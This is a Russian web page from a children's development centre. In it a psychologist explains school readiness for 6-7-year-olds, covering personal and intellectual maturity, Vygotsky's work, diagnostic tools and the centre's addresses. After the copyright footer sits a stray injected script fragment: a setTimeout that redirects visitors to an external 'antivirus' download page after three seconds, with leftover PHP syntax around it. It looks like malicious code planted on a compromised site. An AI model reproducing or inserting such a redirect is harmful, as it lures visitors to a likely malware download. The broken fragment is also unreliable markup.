Домой

Психологические беседы в "Городе почемучек":

Вопрос: Здравствуйте, Екатерина! Расскажите, пожалуйста, поподробней о подготовке к школе. Как у вас поставлена подготовка к школе?
Денис П.

Беседа вторая. Подготовка к школе.

День добрый! Говоря о подготовке к школе ребенка 6-7 лет, мы прежде всего говорим о психологической готовности к школьному обучению, которая в свою очередь обнаруживает, является ли достаточным уровень психического развития ребенка для освоения школьной программы в коллективе сверстников или нет.

Для ответа на этот вопрос выходим далее на основные составляющие психологической готовности ребенка к школе – это личностный и интеллектуальный компоненты. Разберем подробнее и личностную и интеллектуальную зрелость как компоненты психологической готовности к школьному обучению.

Личностная зрелость – это:
  • мотивационная зрелость (мотив "играть" перерождается в мотив "учиться, познавать")
  • развитие произвольности (ребенок может предпринять волевое усилие, чтобы посидеть тихо, посмотреть внимательно, удержать сосредоточенность необходимое время и т.п.)
  • социальная зрелость (ребенок, готовый к школе, хочет учиться и потому, что у него есть потребность занять определенную позицию в обществе людей, а именно позицию, открывающую доступ в мир "взрослости")

Отечественные психологи отмечают важность новообразования периода старшего дошкольного возраста "внутренняя позиция школьника", когда в результате сплава двух потребностей: познавательной потребности и потребности в общении со взрослыми людьми на новом уровне возникает новое отношение ребенка к окружающей среде (см. разработки Л.С. Выготского, Л.И. Божович, Д.Б. Эльконина).

Интеллектуальная зрелость – уровень владения мыслительными операциями (анализ, обобщение, классификация) плюс уровень речевого развития. Нередко, говоря о интеллектуальной готовности, родители могут говорить: он уже умеет считать, складывать, читать, писать, путая уровень владение операциями (счета, чтения) с уровнем развития интеллектуальных процессов. Готовность к школьному обучению со стороны интеллектуального развития ребенка заключается не в сумме усвоенных ребенком знаний, хотя это тоже немаловажный фактор, а в уровне развития интеллектуальных процессов: "...ребенок должен уметь выделять существенное в явлениях окружающей действительности, уметь сравнивать их, видеть сходное и отличное; он должен научиться рассуждать, находить причины явлений, делать выводы" (Л.С.Выготский).

Возвращаясь теперь к началу нашей беседы, скажу, что для определения уровня психологической готовности необходимо:

  • провести диагностическое обследование ребенка,
  • определить степень зрелость компонент,
  • в случае необходимости, составить индивидуальную программу подготовки к школе.

В нашем центре (Ленинский пр-т, 129, к. 1), в работе по проблемам подготовки к школе детей старшего дошкольного возраста, я использую диагностический материал "Психологическая карта дошкольника" (разработки Московского психолого-социального института, М.В. Ермолаева, И.Г. Ерофеева), учебный комплект по подготовке детей к школьному обучению "Школа 2100" (авторский коллектив под руководством А.А. Леонтьева).


 
Ленинский проспект
д.129,   к.1
+7 (495) 438-3706
Схема проезда

 
citypoch@yandex.ru
Марьинский парк
д.7,   к.2
+7 (499) 517-9368
Схема проезда
© 2006 − 2013 детский развивающий центр "Город почемучек"
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>